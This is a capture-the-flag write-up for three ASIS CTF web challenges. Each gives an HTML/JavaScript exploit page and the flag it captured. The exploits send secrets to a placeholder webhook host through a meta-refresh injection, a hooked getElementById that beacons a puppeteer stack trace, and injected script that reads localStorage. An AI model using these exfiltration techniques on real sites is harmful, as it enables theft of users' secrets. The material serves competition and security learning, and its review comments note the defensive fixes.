- CTFtime: https://ctftime.org/event/1953
- 47 solves / 96 pts
<body>
<script>
// Collection endpoint that receives the redirected request (placeholder URL
// as given in the writeup).
const HOOK_URL = "https://webhook.site/xxx";

/**
 * Embeds the challenge page in an iframe, passing a `letter` parameter that
 * holds a <meta http-equiv="Refresh"> tag aimed at HOOK_URL.
 *
 * NOTE(review): the target's handling of `letter` and of the `$gift$` token is
 * not shown on this page. The approach presumably relies on `letter` being
 * written into the response unescaped and `$gift$` being replaced
 * server-side - confirm against the challenge source. CSP fetch directives
 * (script-src, img-src, ...) do not govern a meta-refresh navigation, so the
 * fix belongs on the target: HTML-escape `letter` and never substitute secret
 * values into caller-supplied markup.
 */
const main = async () => {
  const letter = `<meta http-equiv="Refresh" content="0; URL=${HOOK_URL}/?q=$gift$">`;
  const targetUrl =
    "https://gimmecsp.asisctf.com?letter=" + encodeURIComponent(letter);

  const frame = document.createElement("iframe");
  frame.src = targetUrl;
  // The framed request is sent without a Referer header.
  frame.referrerPolicy = "no-referrer";
  document.body.appendChild(frame);
};

main();
</script>
</body>
Flag:
ASIS{1m-n07-r34dy-f0r-2024-y3t-dfadb}
- 11 solves / 271 pts
ref:
- https://github.com/puppeteer/puppeteer/blob/puppeteer-core-v21.6.1/packages/puppeteer-core/src/cdp/ExecutionContext.ts#L293-L302
- https://chromedevtools.github.io/devtools-protocol/tot/Runtime/#method-callFunctionOn
<body>
<script>
// Collection endpoint (placeholder URL as given in the writeup).
const HOOK_URL = "https://webhook.site/xxx";
// Guard so that only the first call is reported.
let sent = false;
/**
 * Replacement for document.getElementById. On its first invocation it
 * captures the current call stack and posts it to HOOK_URL; later calls do
 * nothing. It always returns undefined instead of an element.
 */
function hook() {
if (sent) return;
sent = true;
// An Error records the call stack at construction time, so e.stack includes
// the frames of whatever code called getElementById.
const e = new Error();
navigator.sendBeacon(HOOK_URL, e.stack);
}
// Install the replacement on this page's document object.
// Per the stack trace recorded in this writeup, the caller was puppeteer's
// WaitTask code, and its frame labels embed the on-disk path of puppeteer-core.
// NOTE(review): that implies the automation's helper code ran in the same
// JavaScript context as the page - confirm against the bot source. Defensive
// takeaway: frame labels of code evaluated inside an untrusted page are
// readable by that page, so filesystem paths must not carry secrets.
document.getElementById = hook;
</script>
</body>
The error stack:
Error
at HTMLDocument.hook [as getElementById] (https://...redacted.../index.js:44:13)
at eval (eval at G (:3:1641), <anonymous>:4:22)
at P.<anonymous> (pptr:evaluateHandle;WaitTask.rerun%20(%2FASIS%7Bd1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5%7D%2Fnode_modules%2Fpuppeteer-core%2Flib%2Fcjs%2Fpuppeteer%2Fcommon%2FWaitTask.js%3A80%3A54):4:36)
at P.start (pptr:internal:3:3734)
at pptr:evaluate;WaitTask.rerun%20(%2FASIS%7Bd1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5%7D%2Fnode_modules%2Fpuppeteer-core%2Flib%2Fcjs%2Fpuppeteer%2Fcommon%2FWaitTask.js%3A110%3A32):2:29
Flag:
ASIS{d1d-y0u-m4k3-pupp733r-cry-4n-3rr0r-6u35f5}
It was an unintended solution.
- 9 solves / 300 pts
<body>
<script>
// Base URL of the challenge application; the host name `web` is taken from
// the writeup.
const TARGET_BASE_URL = "http://web";
// Alternative base URL left commented out by the author:
// const TARGET_BASE_URL = "http://localhost:8000";
// Collection endpoint (placeholder URL as given in the writeup).
const HOOK_URL = "https://webhook.site/xxx";

const elm = document.createElement("iframe");
// The `p` parameter carries script text that opens the target in a new window,
// reads the `secret` localStorage entry through that window handle and then
// navigates to HOOK_URL with the value appended.
// NOTE(review): how the target processes `p` is not shown on this page.
// Reading w.localStorage only succeeds for same-origin script, so presumably
// the target executes `p` in (or with access to) its own origin - confirm.
// Defensive takeaway: anything kept in localStorage is readable by any script
// that runs on that origin, so request parameters must never reach a script
// sink there.
elm.src =
  TARGET_BASE_URL +
  "?p=" +
  encodeURIComponent(
    [
      "",
      'const w = open("' + TARGET_BASE_URL + '");',
      'const flag = w.localStorage.getItem("secret");',
      'location = "' + HOOK_URL + '?q=" + flag;',
      "",
    ].join("\n")
  );
document.body.appendChild(elm);
</script>
</body>
Flag:
ASIS{ab2340b08c5e6f4b55c23429c547dc5212f98}
It was an unintended solution.